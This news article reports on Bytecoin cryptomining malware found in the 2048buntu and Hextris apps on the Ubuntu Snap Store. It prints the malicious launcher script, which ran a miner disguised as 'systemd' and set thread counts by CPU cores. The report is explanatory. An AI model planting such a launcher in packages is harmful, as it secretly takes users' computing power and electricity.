A Github user going by the handle of “Tarwirdur” recently identified a cryptocurrency mining malware in 2048buntu and Hextris apps on Ubuntu Snap Store which is an app store for the recently launched package management system.
The malware was found three days ago containing Bytecoin cryptocurrency mining code hidden in the “systemd” background process. Those unaware of Bytecoin, it is a CryptoNote based cryptocurrency with an open source code designed for anonymous cash settlement.
Both apps were added by a user “Nicolas Tomb” along with a hardcoded email address “[email protected].”
#!/bin/bash
currency=bcn
name=2048buntu
{ # try
/snap/$name/current/systemd -u [email protected] --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))
if (( $cores < 4 )); then
/snap/$name/current/systemd -u [email protected] --$currency 1
else
/snap/$name/current/systemd -u [email protected] --$currency 2
fi
}
A cryptocurrency mining malware uses computing power (CPU) of the user device to mine all sorts of cryptocurrencies. During the process, the malware slows down targeted devices and uses victim’s electricity resulting in expensive bills – In some cases, cryptocurrency mining malware even physically destroyed the device it used for mining.
As for the malware in Ubuntu Snap Store, it is a bad news for Ubuntu users. However, according to OmgUbuntu: “All the uploaded apps will undergo automatic testing to ensure compatibility across multiple distros and with current framework snaps are not checked line-by-line, so it is difficult to stop these miners being published on the Snap store.”
At the time of publishing this article, the malware was removed from Ubuntu Snap Store.
Image credit: Depositphotos